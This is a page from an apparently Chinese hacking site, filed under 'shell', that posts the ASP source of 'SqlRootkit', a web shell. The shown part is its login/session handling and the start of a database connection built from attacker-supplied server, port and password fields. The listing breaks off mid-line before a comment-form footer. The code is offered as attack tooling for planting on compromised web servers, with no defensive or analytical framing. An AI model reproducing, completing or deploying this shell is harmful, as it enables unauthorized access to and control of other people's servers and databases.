学生网络
热门关键字: 图片 木马
当前位置 : 黑报 > shell > 正文

sqlrootkit

来源:如有侵权请联系我们作者:Admin时间:08-04-06 点击:

<%on error resume next%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>SqlRootkit</title>
<STYLE TYPE="text/css">
<!--
body { font-size: 14pt;color: black; font-family: impact}
font { border:0;font-size: 16px; color: Red; font-family: impact;text-decoration: none }
form { border:0;background-color: black; font-size: 14pt;color: blue; font-family: impact}
A    { text-decoration: none;}
textarea {width:100%; background-color: black; font-size: 14pt;color: white;font-family: impact}

-->
</STYLE>
</head>
<body bgcolor=black>
<%
if session("login")="" then
                           response.write "<center><font color=red>没有登陆</font></center><br>"
      else response.write "<center><font color=red>已经登陆</font></center><br>"
end if
                           response.write "<center><a href="&Request.ServerVariables("URL")&"?action=logout><font color=black>退出登陆</font></a></center><br>"
%>
<%
If request("action")="login" then
         set adoConn=Server.CreateObject("ADODB.Connection")
          adoConn.Open "Provider=SQLOLEDB.1;DATA SOURCE=" & request.Form("server") & "," & request.Form("port") & ";Password=" & request.Form("pa

最新评论共有 0 位网友发表了评论
发表评论
评论内容:不能超过250字,需审核,请自觉遵守互联网相关政策法规。
用户名: 验证码: 验证码
查看所有评论
相关文章